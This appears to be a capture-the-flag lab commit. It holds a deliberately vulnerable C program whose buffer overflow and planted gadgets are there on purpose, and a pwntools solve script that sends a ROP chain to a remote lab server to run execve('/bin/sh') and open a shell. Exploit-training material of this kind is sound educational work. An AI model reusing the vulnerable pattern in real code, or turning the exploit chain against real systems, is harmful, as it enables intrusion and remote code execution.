rop and lab3_4_recap

lab3_4_recap/01_aquabank_armory/.gdb_history

@@ -0,0 +1,6 @@
+disass win
+disass main
+disass vuln
+r
+vmmap
+quit

lab3_4_recap/01_aquabank_armory/main.c

@@ -0,0 +1,28 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+static void setup(void) {
+    setvbuf(stdin, NULL, _IONBF, 0);
+    setvbuf(stdout, NULL, _IONBF, 0);
+    setvbuf(stderr, NULL, _IONBF, 0);
+}
+
+__attribute__((naked, used)) void pop_rdi_ret(void) { __asm__("pop %rdi; ret"); }
+__attribute__((naked, used)) void pop_rsi_ret(void) { __asm__("pop %rsi; ret"); }
+__attribute__((naked, used)) void pop_rdx_ret(void) { __asm__("pop %rdx; ret"); }
+__attribute__((naked, used)) void syscall_ret(void) { __asm__("syscall; ret"); }
+
+static void vuln(void) {
+    char buf[64];
+
+    puts("[armory] Storeroom open -- pick your weapons:");
+    (void)read(STDIN_FILENO, buf, 512);
+    puts("[armory] Locking down.");
+}
+
+int main(void) {
+    setup();
+    vuln();
+    return 0;
+}

lab3_4_recap/01_aquabank_armory/solve.py

@@ -0,0 +1,36 @@
+from pwn import *
+
+OFF = 64
+context.binary = elf = ELF("./aquabank-armory", checksec=False)
+# p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13540)
+print(p.recvline(b"[armory] Storeroom open -- pick your weapons:\n"))
+ret = 0x000000000040101A
+syscall = 0x0000000000401324
+pop_rdi = 0x000000000040196E
+pop_rsi = 0x0000000000401977
+pop_rdx = 0x0000000000401980
+pop_rax = 0x00000000004214EB
+writable = 0x4AC000
+mov_qword_ptr_rdx_rax = 0x000000000040AB08
+shellstr = b"/bin/sh\x00"
+payload = flat(
+    b"A" * OFF,
+    p64(ret),
+    p64(pop_rdx),
+    p64(writable),
+    p64(pop_rax),
+    shellstr,
+    p64(mov_qword_ptr_rdx_rax),
+    p64(pop_rax),
+    p64(59),
+    p64(pop_rdi),
+    p64(writable),
+    p64(pop_rsi),
+    p64(0),
+    p64(pop_rdx),
+    p64(0),
+    p64(syscall),
+)
+p.sendline(payload)
+p.interactive()